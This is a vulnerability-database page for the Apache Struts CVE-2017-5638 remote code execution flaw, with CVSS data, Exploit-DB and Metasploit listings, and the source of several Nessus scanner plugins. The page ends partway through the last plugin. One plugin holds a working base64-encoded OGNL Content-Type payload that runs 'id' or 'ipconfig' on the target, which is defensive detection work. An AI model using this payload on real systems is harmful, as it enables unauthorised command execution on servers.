CVE-2017-5638 - Improper Handling of Exceptional Conditions vulnerability in multiple products
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Summary
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Exploit-Db
description | Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit). CVE-2017-5638. Remote exploit for Multiple platform. Tags: Metasploit Framework |
file | exploits/multiple/remote/41614.rb |
id | EDB-ID:41614 |
last seen | 2017-03-15 |
modified | 2017-03-15 |
platform | multiple |
port | 8080 |
published | 2017-03-15 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41614/ |
title | Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) |
type | remote |

description | Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. CVE-2017-5638. Webapps exploit for Linux platform |
file | exploits/linux/webapps/41570.py |
id | EDB-ID:41570 |
last seen | 2017-03-10 |
modified | 2017-03-07 |
platform | linux |
port | |
published | 2017-03-07 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41570/ |
title | Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution |
type | webapps |
Metasploit
description | This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk. |
id | MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL |
last seen | 2020-06-04 |
modified | 2019-06-24 |
published | 2017-03-09 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_content_type_ognl.rb |
title | Apache Struts Jakarta Multipart Parser OGNL Injection |
Nessus
NASL family | Windows |
NASL id | ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL |
description | Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number. |
last seen | 2020-06-05 |
modified | 2020-06-01 |
plugin id | 136998 |
published | 2020-06-01 |
reporter | This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/136998 |
title | Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU) |
code |

```nasl
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(136998);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/07/27");

  script_cve_id(
    "CVE-2015-7501",
    "CVE-2016-0714",
    "CVE-2017-3540",
    "CVE-2017-3541",
    "CVE-2017-3542",
    "CVE-2017-3543",
    "CVE-2017-3545",
    "CVE-2017-3554",
    "CVE-2017-3591",
    "CVE-2017-3593",
    "CVE-2017-3594",
    "CVE-2017-3595",
    "CVE-2017-3596",
    "CVE-2017-3597",
    "CVE-2017-3598",
    "CVE-2017-3602",
    "CVE-2017-3603",
    "CVE-2017-5638"
  );
  script_xref(name:"IAVA", value:"2017-A-0113");

  script_name(english:"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)");

  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote host is affected by multiple
security vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"Oracle WebCenter Sites component of Oracle Fusion Middleware is
vulnerable to multiple vulnerabilities.

  - A remote code execution in the Oracle WebCenter Sites component
    of Oracle Fusion Middleware (subcomponent: Install (Apache Common
    Collections)). An unauthenticated, remote attacker can exploit
    this, via a crafted serialized Java object, to bypass
    authentication and execute arbitrary commands. (CVE-2015-7501)

  - An unspecified vulnerability in the Oracle WebCenter Sites
    component of Oracle Fusion Middleware (subcomponent: Server). An
    unauthenticated, remote attacker can exploit this, via HTTP, to
    obtain access to critical data or complete access to all Oracle
    WebCenter Sites accessible data as well as unauthorized update,
    insert or delete access to some of Oracle WebCenter Sites
    accessible data and unauthorized ability to cause a partial
    denial of service (partial DOS) of Oracle WebCenter Sites.
    (CVE-2017-3542)

  - A remote code execution in the Oracle WebCenter Sites component
    of Oracle Fusion Middleware (subcomponent: Third Party Tools
    (Struts 2)) due to incorrect exception handling and error-message
    generation during file-upload attempts. An unauthenticated,
    remote attacker can exploit this, via a crafted Content-Type,
    Content-Disposition, or Content-Length HTTP header, to bypass
    authentication and execute arbitrary commands. (CVE-2017-5638)

In addition, Oracle WebCenter Sites is also affected by several
additional vulnerabilities including code execution, denial of
service, information disclosure, and other unspecified
vulnerabilities.

Note that Nessus has not attempted to exploit these issues but has
instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://www.oracle.com/security-alerts/cpuapr2017.html");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the April 2017 Oracle
Critical Patch Update advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/06/01");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_webcenter_sites_installed.nbin");
  script_require_keys("SMB/WebCenter_Sites/Installed");

  exit(0);
}

port = get_kb_item('SMB/transport');
if (isnull(port)) port = 445;

get_kb_item_or_exit('SMB/WebCenter_Sites/Installed');

versions = get_kb_list('SMB/WebCenter_Sites/*/Version');
if (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');

report = '';
foreach key (keys(versions))
{
  fix = '';
  version = versions[key];
  revision = get_kb_item(key - '/Version' + '/Revision');
  path = get_kb_item(key - '/Version' + '/Path');

  if (isnull(version) || isnull(revision)) continue;

  # Patch 25883419 - 11.1.1.8.0 < Revision 184000
  if (version =~ "^11\.1\.1\.8\.0$" && revision < 184000)
  {
    fix = '\n  Fixed revision : 184000' +
          '\n  Required patch : 25883419';
  }
  # Patch 25806935 - 12.2.1.0.0 < Revision 184040
  else if (version =~ "^12\.2\.1\.0\.0$" && revision < 184040)
  {
    fix = '\n  Fixed revision : 184040' +
          '\n  Required patch : 25806935';
  }
  # Patch 25806943 - 12.2.1.1.0 < Revision 184025
  else if (version =~ "^12\.2\.1\.1\.0$" && revision < 184025)
  {
    fix = '\n  Fixed revision : 184025' +
          '\n  Required patch : 25806943';
  }
  # Patch 25806946 - 12.2.1.2.0 < Revision 184026
  else if (version =~ "^12\.2\.1\.2\.0$" && revision < 184026)
  {
    fix = '\n  Fixed revision : 184026' +
          '\n  Required patch : 25806946';
  }

  if (fix != '')
  {
    if (!isnull(path)) report += '\n  Path           : ' + path;
    report += '\n  Version        : ' + version +
              '\n  Revision       : ' + revision +
              fix + '\n';
  }
}

if (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);
else audit(AUDIT_INST_VER_NOT_VULN, "Oracle WebCenter Sites");
```
NASL family | CGI abuses |
NASL id | STRUTS_2_5_10_1_RCE.NASL |
description | The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 97610 |
published | 2017-03-08 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/97610 |
title | Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) |
code |

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97610);
  script_version("1.21");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-5638");
  script_bugtraq_id(96729);
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");

  script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)");
  script_summary(english:"Attempts to execute arbitrary commands on the remote web server.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a web application that uses a Java
framework that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Struts running on the remote host is affected by
a remote code execution vulnerability in the Jakarta Multipart parser
due to improper handling of the Content-Type header. An
unauthenticated, remote attacker can exploit this, via a specially
crafted Content-Type header value in the HTTP request, to potentially
execute arbitrary code, subject to the privileges of the web server
user.");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
Alternatively, apply the workaround referenced in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");

port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list('/');

# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match3))
    {
      urls = make_list(urls, match3[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}

if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

urls = list_uniq(urls);

vuln = FALSE;
rand_var = rand_str(length:8);
header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data";
headers_1 = make_array("Content-Type", header_payload);

# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV
# vendors.
# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))
exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX";
exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ";
exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w";
exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb";
exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi";
exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t";
exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz";
exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja";
exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG";
exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N";
exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn";
exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL";
exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS";
exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB";
exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv";
exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI";
exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo=";
headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit)));

# Since struts apps could be taking longer
timeout = get_read_timeout() * 2;
if(timeout < 10) timeout = 10;
http_set_read_timeout(timeout);

foreach url (urls)
{
  ############################################
  # Method 1
  ############################################
  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    add_headers  : headers_1,
    exit_on_fail : TRUE
  );

  if ( ("X-Tenable: "+ rand_var ) >< res[1] ) vuln = TRUE;

  # Stop after first vulnerable Struts app is found
  if (vuln) break;

  ############################################
  # Method 2
  ############################################
  cmd_pats = make_array();
  cmd_pats['id'] = "uid=[0-9]+.*\sgid=[0-9]+.*";
  cmd_pats['ipconfig'] = "Subnet Mask|Windows IP|IP(v(4|6)?)? Address";

  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    add_headers  : headers_2,
    exit_on_fail : TRUE
  );

  if ("Windows IP" >< res[2] || "uid" >< res[2])
  {
    if (pgrep(pattern:cmd_pats['id'], string:res[2]))
    {
      output = strstr(res[2], "uid");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
    else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))
    {
      output = strstr(res[2], "Windows IP");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
  }
}

if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');

security_report_v4(
  port     : port,
  severity : SECURITY_HOLE,
  generic  : TRUE,
  request  : make_list(http_last_sent_request()),
  output   : chomp(output)
);
```
NASL family | Misc. |
NASL id | STRUTS_2_5_10_1_WIN_LOCAL.NASL |
description | The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 97576 |
published | 2017-03-07 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/97576 |
title | Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046) |
code |

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97576);
  script_version("1.21");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-5638");
  script_bugtraq_id(96729);
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");

  script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)");
  script_summary(english:"Checks the Struts 2 version.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host contains a web application that uses a Java framework
that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Struts running on the remote host is 2.3.5
through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,
affected by a remote code execution vulnerability in the Jakarta
Multipart parser due to improper handling of the Content-Type,
Content-Disposition, and Content-Length headers. An unauthenticated,
remote attacker can exploit this, via a specially crafted header value
in the HTTP request, to potentially execute arbitrary code.

Note that Nessus has not tested for this issue but has instead relied
only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-046");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
Alternatively, apply the workaround referenced in the vendor advisory.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/07");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"combined");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts");

  exit(0);
}

include("vcf.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

app_info = vcf::combined_get_app_info(app:"Apache Struts");

vcf::check_granularity(app_info:app_info, sig_segments:2);

constraints = [
  { "min_version" : "2.3.5", "max_version" : "2.3.31", "fixed_version" : "2.3.32" },
  { "min_version" : "2.5", "max_version" : "2.5.10", "fixed_version" : "2.5.10.1" }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
```
NASL family | Misc. |
NASL id | ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL |
description | The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 99528 |
published | 2017-04-21 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/99528 |
title | Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU) |
code |

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99528);
  script_version("1.12");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id(
    "CVE-2016-1181",
    "CVE-2017-3506",
    "CVE-2017-3531",
    "CVE-2017-5638"
  );
  script_bugtraq_id(
    91068,
    91787,
    96729,
    97884
  );
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");
  script_xref(name:"TRA", value:"TRA-2017-16");
  script_xref(name:"ZDI", value:"ZDI-16-444");

  script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)");
  script_summary(english:"Checks for the patch.");

  script_set_attribute(attribute:"synopsis", value:
"An application server installed on the remote host is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Oracle WebLogic Server installed on the remote host is
affected by multiple vulnerabilities :

  - A remote code execution vulnerability exists in the Apache Struts
    component due to improper handling of multithreaded access to an
    ActionForm instance. An unauthenticated, remote attacker can
    exploit this, via a specially crafted multipart request, to
    execute arbitrary code or cause a denial of service condition.
    (CVE-2016-1181)

  - An unspecified flaw exists in the Web Services subcomponent that
    allows an unauthenticated, remote attacker to modify or delete
    arbitrary data accessible to the server. (CVE-2017-3506)

  - A remote code execution vulnerability exists in the Web Container
    subcomponent due to improper handling of reflected PartItem File
    requests. An unauthenticated, remote attacker can exploit this,
    via a specially crafted request, to execute arbitrary code.
    (CVE-2017-3531)

  - A remote code execution vulnerability exists in the Apache Struts
    component in the Jakarta Multipart parser due to improper
    handling of the Content-Type, Content-Disposition, and
    Content-Length headers. An unauthenticated, remote attacker can
    exploit this, via a specially crafted header value in the HTTP
    request, to execute arbitrary code. (CVE-2017-5638)");
  # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?623d2c22");
  # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?eb4db3c7");
  script_set_attribute(attribute:"see_also", value:"https://support.oracle.com/rs?type=doc&id=2228898.1");
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2017-16");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-444/");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the April 2017 Oracle
Critical Patch Update advisory.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/21");

  script_set_attribute(attribute:"plugin_type", value:"local");
